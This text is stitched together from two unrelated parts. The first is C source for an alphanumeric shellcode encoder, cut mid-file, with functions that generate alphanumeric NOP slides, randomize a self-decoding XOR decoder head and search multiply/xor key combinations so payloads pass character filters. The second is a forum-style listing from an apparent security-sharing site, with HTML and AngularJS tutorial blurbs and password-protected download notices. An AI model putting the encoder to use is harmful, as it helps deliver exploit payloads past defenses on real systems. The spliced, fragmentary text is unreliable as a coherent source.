while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1)) { alnum--; strcat(temp_buf, "(buf[0]*'"); temp_buf[strlen(temp_buf)] = *alnum; strcat(temp_buf, "')^buf[1]"); return(temp_buf); } } alnum-=strlen(ALNUM_CHARSET); while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0)) { alnum--; printf("key = 0x%2X ('%c')\n", *alnum, *alnum); return("found pattern using: (buf[1]*key)^buf[0]\n"); } } if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1)) return("(buf[0]*0x30)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0)) return("(buf[1]*0x30)^buf[0]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1)) return("(buf[0]*0x10)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0)) return("(buf[1]*0x10)^buf[0]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]*buf[1])^buf[2]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]*buf[2])^buf[1]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]*buf[2])^buf[0]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]^buf[1])*buf[2]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]^buf[2])*buf[1]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]^buf[2])*buf[0]"); else return ""; } BOOL is_alnum(UCHAR c) { char *alnum = ALNUM_CHARSET; char search_c[2] = ""; search_c[0] = c; return((BOOL)strstr(alnum, search_c)); } BOOL str_is_alnum(UCHAR *str) { ULONG length; length = strlen(str); for(;length>0;length--) { if( 
!is_alnum(str[length-1]) ) return 0; } return 1; } UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) { int xor_complement_1, xor_complement_2; UCHAR two_xor_complements[3]; for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++) { if (is_alnum((UCHAR)xor_complement_1)) { for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++) { if (is_alnum((UCHAR)xor_complement_2)) { if(byte == (xor ^ xor_complement_1 ^ xor_complement_2)) { two_xor_complements[0] = (UCHAR)xor_complement_1; two_xor_complements[1] = (UCHAR)xor_complement_2; } } } } } if(index == 0 || index == 1) return two_xor_complements[index]; else return (UCHAR)0; } BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key) { return (BOOL) strstr(alnum_shellcode, terminating_key); } DWORD ip_str_to_dw(UCHAR *str) { DWORD x[4]; int dwIpAddress; if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN) return -1; sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]); x[3] = x[3] > 255 ? -1 : (x[3] <<= 24); x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); x[0] = x[0] > 255 ? 
-1 : (x[0] <<= 0);
    dwIpAddress = x[0]+x[1]+x[2]+x[3];
    return dwIpAddress;
}

DWORD my_htonl(DWORD dw_in)
{
    DWORD dw_out;
    *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0);
    *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1);
    *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2);
    *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3);
    return dw_out;
}

void free_p_xor2_key(struct xor2_key *node)
{
    struct xor2_key *temp = 0;
    if(node)
    {
        temp = node->prev;
        while(node->next)
        {
            node=node->next;
            free(node->prev);
        }
        free(node);
    }
    if(temp)
    {
        while(temp->prev)
        {
            temp=temp->prev;
            free(temp->next);
        }
        free(temp);
    }
}

struct xor2_key *choose_random_node(struct xor2_key *head)
{
    int num_nodes = 1, selected_node, i;
    struct xor2_key* tail = head;
    struct xor2_key* pn = NULL;
    if (!head || !head->key) return 0;
    while(tail->next)
    {
        tail = tail->next;
        num_nodes++;
    }
    selected_node = rand()%num_nodes;
    for(i=0; i<selected_node; i++)
        head = head->next;
    return head;
}

struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c)
{
    struct xor2_key *p_xor2_key, *p_xor2_key_head;
    char *alnum = ALNUM_CHARSET;
    UINT i=0, z=1, r=0, count=0;
    UCHAR xor2=0, x=0;
    p_xor2_key_head = p_xor2_key = malloc(sizeof(struct xor2_key));
    p_xor2_key->prev = 0;
    p_xor2_key->next = 0;
    p_xor2_key->key = 0;
    p_xor2_key->xor2 = 0;
    for(i=0; alnum[i]; i++)
    {
        for(x=0; alnum[x]; x++)
        {
            xor2 = alnum[x];
            if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c)
            {
                p_xor2_key->xor2 = xor2;
                p_xor2_key->key = alnum[i];
                p_xor2_key->next = malloc(sizeof(struct xor2_key));
                p_xor2_key->next->prev = p_xor2_key;
                p_xor2_key = p_xor2_key->next;
                p_xor2_key->key=0;
                p_xor2_key->xor2=0;
            }
        }
    }
    if(!p_xor2_key->key) p_xor2_key->next = 0;
    if (p_xor2_key->prev) p_xor2_key = p_xor2_key->prev;
    else return 0;
    free(p_xor2_key->next);
    p_xor2_key->next=0;
    return p_xor2_key_head;
}

UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null.
{
    UINT last, randomNum;
    UCHAR temporary;
    UCHAR *output = malloc(length);
    memcpy(output, str, length);
    for (last = length; last > 1; last--)
    {
        randomNum = rand() % last;
        temporary = output[randomNum];
        output[randomNum] = output[last-1];
        output[last-1] = temporary;
    }
    memcpy(str, output, length);
    return output;
} // taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm

UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide)
{
    UCHAR *prefix_substr, *substr, *suffix_substr, *output_str;
    UINT prefix_substr_len, suffix_substr_len;
    if(slide > substr_offset)
    {
        printf("you can't slide it that far back!\n");
        return 0;
    }
    output_str = malloc(str_len);
    memset(output_str, 0, str_len);
    suffix_substr_len = str_len-substr_len-substr_offset;
    suffix_substr = malloc(suffix_substr_len);
    memset(suffix_substr, 0, suffix_substr_len);
    prefix_substr_len = substr_offset;
    prefix_substr = malloc(prefix_substr_len);
    memset(prefix_substr, 0, prefix_substr_len);
    substr = malloc(substr_len);
    memset(substr, 0, substr_len);
    strncpy(substr, str+substr_offset, substr_len);
    strncpy(prefix_substr, str, prefix_substr_len);
    strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len);
    strncpy(output_str, prefix_substr, prefix_substr_len-slide);
    strncpy(output_str+prefix_substr_len-slide, substr, substr_len);
    strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide);
    strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len);
    free(prefix_substr);
    free(suffix_substr);
    free(substr);
    return output_str;
}

UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide)
{
    UCHAR *prefix_substr, *substr, *suffix_substr, *output_str;
    UINT prefix_substr_len, suffix_substr_len;
    if(slide > str_len-substr_len-substr_offset)
    {
        printf("you can't slide it that far forward!\n");
        return 0;
    }
    output_str = malloc(str_len);
    memset(output_str, 0, str_len);
    suffix_substr_len = str_len-substr_len-substr_offset;
    suffix_substr = malloc(suffix_substr_len);
    memset(suffix_substr, 0, suffix_substr_len);
    prefix_substr_len = substr_offset;
    prefix_substr = malloc(prefix_substr_len);
    memset(prefix_substr, 0, prefix_substr_len);
    substr = malloc(substr_len);
    memset(substr, 0, substr_len);
    strncpy(substr, str+substr_offset, substr_len);
    strncpy(prefix_substr, str, prefix_substr_len);
    strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len);
    strncpy(output_str, prefix_substr, prefix_substr_len);
    strncpy(output_str+prefix_substr_len, suffix_substr, slide);
    strncpy(output_str+prefix_substr_len+slide, substr, substr_len);
    strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide);
    free(prefix_substr);
    free(suffix_substr);
    free(substr);
    return output_str;
}

UCHAR *get_nop_slide(UINT size, UINT slide)
{
    //simple alnum nop slide generator
    UINT i, x, append_dec_eax = 0;
    UCHAR alnum_nop[][3] = {
        "AI", //inc ecx;dec ecx // (alnum_nop[0])
        "BJ", //inc edx;dec edx // (alnum_nop[1])
        "CK", //inc ebx;dec ebx // (alnum_nop[2])
        "EM", //inc ebp;dec ebp // (alnum_nop[3])
        "FN", //inc esi;dec esi // (alnum_nop[4])
        "GO", //inc edi;dec edi // (alnum_nop[5])                                                  [we don't care about eax value before the imul]
        "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2                   [instruction as it overwrites eax with result  ]
        "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2                   [and we don't care about edi value at all.     ]
        "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--.    //we can freely inc/dec esp for now
     // "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--|    //but we need to take it into account
     // "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--|    //once we start pushing/poping to/from
     // "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--'    //the stack.
     //                                                                                         |
     //TODO: <-----------------------------------------------------------------------------------'
     //   push eax   push eax   push eax   push ecx   push edx
     //   pop eax    push ecx   push ecx   dec esp    pop edx
     //   push ecx   pop ecx    push edx   inc esp    push ecx
     //   pop ecx    pop eax    inc esp    pop ecx    pop ecx
     //   push edx   push edx   dec esp    push eax   push eax
     //   pop edx    pop edx    pop edx    inc esp    pop eax
     //              pop ecx    dec esp    .
     //              pop eax    pop eax    .
     //              push edx              .
     //              pop edx               etc...
    };
    UCHAR *nop_slide;
    nop_slide = malloc(size);
    memset(nop_slide, 0, size);
    if(size%2)
    {
        append_dec_eax = 1;
        size--;
    }
    for(i=0; i<(size/2); i++)
    {
        do x = rand()%(sizeof(alnum_nop)/3);
        while ((slide==2)&&(x==6||x==7));
        strcat(nop_slide, alnum_nop[x]);
    }
    if(append_dec_eax)
    {
        strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide
    }
    return nop_slide;
}

UCHAR get_random_alnum_push_dword_opcode()
{
    UCHAR alnum_push_dword_opcode[] = {
        'P', //0x50 push eax
        'Q', //0x51 push ecx
        'R', //0x52 push edx
        'S', //0x53 push ebx
        'T', //0x54 push esp
        'U', //0x55 push ebp
        'V', //0x56 push esi
        'W'  //0x57 push edi
    };
    return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)];
}

UCHAR get_random_alnum_value()
{
    char alnum_values[] = ALNUM_CHARSET;
    return alnum_values[rand()%strlen(alnum_values)];
}

UCHAR get_push_register_instruction(UCHAR *reg)
{
    if (!strcmp(reg, "eax"))      return 'P'; //0x50 push eax
    else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx
    else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx
    else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx
    else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp
    else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp
    else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi
    else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi
    else return 0;
}

UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1)
{
    UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10};
    UCHAR instructions[11][3];
    UCHAR instruction_comments[11][28];
    UINT i, c, state;
    UCHAR *output;
    UCHAR *random_states;
    UCHAR *p_state[5];
    output = malloc(17);
    memset(output, 0, 17);
    memset(instructions, 0, 11*3);
    memset(instruction_comments, 0, 11*28);
    instructions[0][0] = '\x6a';         //j
    instructions[0][1] = xor_al1;        //
    instructions[1][0] = '\x58';         //X
    instructions[2][0] = '\x34';         //4
    instructions[2][1] = xor_al1;        //
    instructions[3][0] = '\x48';         //H
    instructions[4][0] = '\x34';         //4
    instructions[4][1] = jne_xor1;       //
    instructions[5][0] = '\x30';         //0
    instructions[5][1] = '\x42';         //B
    instructions[5][2] = size_decoder-1; //
    instructions[6][0] = '\x52';         //R
    instructions[7][0] = '\x52';         //R
    instructions[8][0] = '\x59';         //Y
    instructions[9][0] = '\x47';         //G
    instructions[10][0] = '\x43';        //C
    strcat(instruction_comments[0], "push XOR_AL1");
    strcat(instruction_comments[1], "pop eax");
    strcat(instruction_comments[2], "xor al, XOR_AL1");
    strcat(instruction_comments[3], "dec eax");
    strcat(instruction_comments[4], "xor al, JNE_XOR1");
    strcat(instruction_comments[5], "xor byte ptr [edx+size], al");
    strcat(instruction_comments[6], "push edx");
    strcat(instruction_comments[7], "push edx");
    strcat(instruction_comments[8], "pop ecx");
    strcat(instruction_comments[9], "inc edi");
    strcat(instruction_comments[10], "inc ebx");
    do
    {
        memset(p_state, 0, sizeof(UCHAR*)*5);
        random_states = shuffle(states, 11);
        //.*0.*1.*2.*3.*4.*5
        p_state[0] = memchr(random_states, 0, 11);
        if(p_state[0]) p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states));
        if(p_state[1]) p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states));
        if(p_state[1]) p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states));
        if(p_state[1]) p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states));
        if(p_state[1]) p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states));
        //.*[67].*8
        if(p_state[1])
        {
            p_state[2] = memchr(random_states, 6, 11);
            p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states));
            if(!p_state[3])
            {
                p_state[2] = memchr(random_states, 7, 11);
                p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states));
            }
            if(p_state[3])
            {
                //.*1.*[67].*[67]
                if(p_state[2] && p_state[1] < p_state[2])
                    p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states));
                //.*0.*[67].*8.*1
                if(!p_state[4]) p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states));
                if(!p_state[4]) p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states));
                if(p_state[4])  p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states));
                if(p_state[4])  p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states));
                //.*[67].*8.*0.*1.*[67]
                if(!p_state[4]) p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states));
                if(p_state[4])  p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states));
                if(p_state[4])  p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states));
            }
        }
    } while (!p_state[4]);
    for (c=state=0; state<sizeof(states); state++)
    {
        i=0;
        while (instructions[random_states[state]][i] && i < 3)
        {
            output[c] = instructions[random_states[state]][i];
            i++;
            c++;
        }
    }
    printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n",
           random_states[0], random_states[1], random_states[2], random_states[3],
           random_states[4], random_states[5], random_states[6], random_states[7],
           random_states[8], random_states[9], random_states[10]);
    printf("%s\n"
           "%s\n"
           "%s\n"
           "%s\n"
           "%s\n"
           "%s\n"
           "%s\n"
           "%s\n"
           "%s\n"
           "%s\n"
           "%s\n======================\n",
           instruction_comments[random_states[0]],
           instruction_comments[random_states[1]],
           instruction_comments[random_states[2]],
           instruction_comments[random_states[3]],
           instruction_comments[random_states[4]],
           instruction_comments[random_states[5]],
           instruction_comments[random_states[6]],
           instruction_comments[random_states[7]],
           instruction_comments[random_states[8]],
           instruction_comments[random_states[9]],
           instruction_comments[random_states[10]]);
    return output;
}
  20. Programming-HTML

    Top books for learning HTML, in PDF format. Password for all files: anonysec.org (7 books)
  21. Programming-HTML

    What is HTML? The term HTML stands for Hyper Text Markup Language, that is, a markup language for hypertext. HTML is the standard language for designing web pages, and all of a page's code, whether server-side or client-side, is ultimately converted into HTML code and displayed by the browser. In other words, browsers do not understand any server-side code or controls such as ASP and PHP code; the only code they understand is HTML. The compilers of server-side programming languages ultimately convert their code into HTML for display and send it to the browser so that it can be shown to users. HTML is a markup language, meaning that the different parts are separated by elements called tags, each of which has its own use and properties. These tags tell the browser what kind of element each part of the page is and how it should be displayed; the article on HTML tags covers this topic in detail. In an HTML page you can place various elements such as text, headings, images, tables and so on, and for each element you must use its corresponding tag. HTML pages consist only of code in the form of text. This means that to show an image, a table and so on, the HTML code for each of them has to be written, and when the browser reaches these codes and tags it displays the elements associated with them. Each HTML code has a specific meaning and has a specific effect on the content. For example, tags are defined in HTML for changing the appearance of text, such as enlarging and bolding a word, or for linking to other pages. An HTML document is a text-based file, usually named with the .htm or .html extension, whose contents consist of HTML tags. Web browsers, which are able to understand and interpret HTML tags, read each of them from within the HTML document and then render the content of that page.
    HTML is not a programming language; rather, it is a language for marking up hypertext and is essentially used to structure information and separate the logical components of a document, such as headings, images, lists, paragraphs and tables. On the other hand, HTML should not be used as a language for laying out or drawing web pages.
  22. Programming-HTML

    Introduction to the HTML tutorial. HTML tutorial - Introduction. With this tutorial you can design your website yourself. In this self-study guide you will see material about HTML. Learning HTML is easy, and you will enjoy learning it. HTML tutorial with hundreds of examples: in this guide, hundreds of examples are used to teach HTML. With the editor at your disposal, you can edit the HTML document and see the result by clicking a button. Example (HTML tutorial introduction):
    <html>
    <body>
    <h1>My First Heading</h1>
    <p>My first paragraph.</p>
    </body>
    </html>
    What is HTML? HTML is a language for describing web pages. HTML is the acronym of the words Hyper Text Markup Language (hypertext markup language). HTML is not a programming language, but a markup language. A markup language is a set of tags. HTML uses tags to describe web pages. HTML tags: HTML tags are keywords placed inside angle brackets, like <HTML>. HTML tags usually come in pairs. The first tag is the start tag and the second tag is the end tag. Start and end tags are also called opening and closing tags. HTML document = web page. HTML documents describe web pages. HTML documents contain HTML tags and plain text. HTML documents are also called web pages. The purpose of a web browser (such as Internet Explorer or Firefox) is to read HTML documents and display them as web pages. The browser does not display the HTML tags, but uses them to interpret the content of the page. Example:
    <html>
    <body>
    <h1>My First Heading</h1>
    <p>My first paragraph.</p>
    </body>
    </html>
    Explanation of the example: the text between <html> and </html> describes the web page. The text between <body> and </body> is the visible content of the page. The text between <h1> and </h1> is used to display a heading. The text between <p> and </p> is used to display a paragraph.
  23. Programming-HTML

    Angular tutorial - AngularJS tutorial. AngularJS is based on HTML together with new attributes. AngularJS is a complete language for single-page applications. Learning AngularJS is very easy. Start learning AngularJS now! Purpose of these tutorials: these tutorials are specifically designed to help you learn AngularJS quickly. First you will learn the basics of Angular, such as directives, expressions, filters, modules and controllers. Then you will learn everything you need to know about Angular, such as events, the DOM, forms, input, validation, Http and so on. Try the examples yourself in each chapter: in each chapter you can edit the examples online and see the result by clicking a button. An Angular example:
    <!DOCTYPE html>
    <html lang="en-US">
    <script src="http://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular.min.js"></script>
    <body>
    <div ng-app="">
    <p>Name : <input type="text" ng-model="name"></p>
    <h1>Hello {{name}}</h1>
    </div>
    </body>
    </html>
    What you should already know: before you start learning Angular, you should have a basic knowledge of the following: HTML, CSS, JavaScript. Angular history: version 1.0 of Angular was released in 2012. In 2009 a Google employee named Miško Hevery started working on Angular. The idea turned out very well, and the project is now officially supported by Google.
  24. Programming-HTML

    In this topic, the 0-to-100 HTML tutorial will be posted as videos. Number of parts: 61. Password for all files: anonysec.org
  25. Programming-HTML

    Professional HTML training course. *Simple learning *Text-based tutorial *With continuous examples